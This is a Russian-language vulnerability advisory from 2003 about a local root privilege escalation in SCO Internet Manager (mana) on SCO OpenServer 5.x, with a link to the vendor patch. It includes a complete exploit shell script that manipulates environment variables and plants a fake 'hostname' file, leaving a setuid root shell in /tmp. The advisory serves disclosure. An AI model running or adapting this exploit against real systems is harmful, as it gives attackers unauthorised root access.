Локальное выполнение произвольного кода в Internet Manager (mana) для SCO UNIX

Дата публикации:
18.09.2003
Всего просмотров:
951
Опасность:
Низкая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Локальная
Воздействие:
Повышение привилегий
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
SCO OpenServer 5.x

Уязвимые версии: SCO Internet Manager (mana)

Описание: Уязвимость обнаружена в Internet Manager (mana) для SCO UNIX. Локальный пользователь может получить root привилегии на системе.

Локальный пользователь может установить REMOTE_ADDR переменную среды к '127.0.0.1' и затем запустить '/usr/internet/admin/mana/mana', чтобы заставить приложение выполнить 'menu.mana' файл без требуемой авторизации.

Также сообщается, что локальный пользователь может установить переменную окружения PATH_INFO к '/pass-err.mana' и PATH к './:$PATH', чтобы заставить mana выполнить файл './hostname' с root привилегиями.

Пример/Эксплоит:

#!/bin/sh
# OpenServer 5.0.7 - Local mana root shell
REMOTE_ADDR=3D127.0.0.1
PATH_INFO=3D/pass-err.mana
PATH=3D./:$PATH
export REMOTE_ADDR
export PATH_INFO
export PATH
echo "cp /bin/sh /tmp;chmod 4777 /tmp/sh;" > hostname
chmod 755 hostname
/usr/internet/admin/mana/mana > /dev/null
/tmp/sh

URL производителя: http://www.sco.com/

Решение:

Установите следующую заплату: ftp://ftp.sco.com/pub/updates/OpenServer/CSSA-2003-SCO.19

Ссылки: SCO internet manager local root
или введите имя

CAPTCHA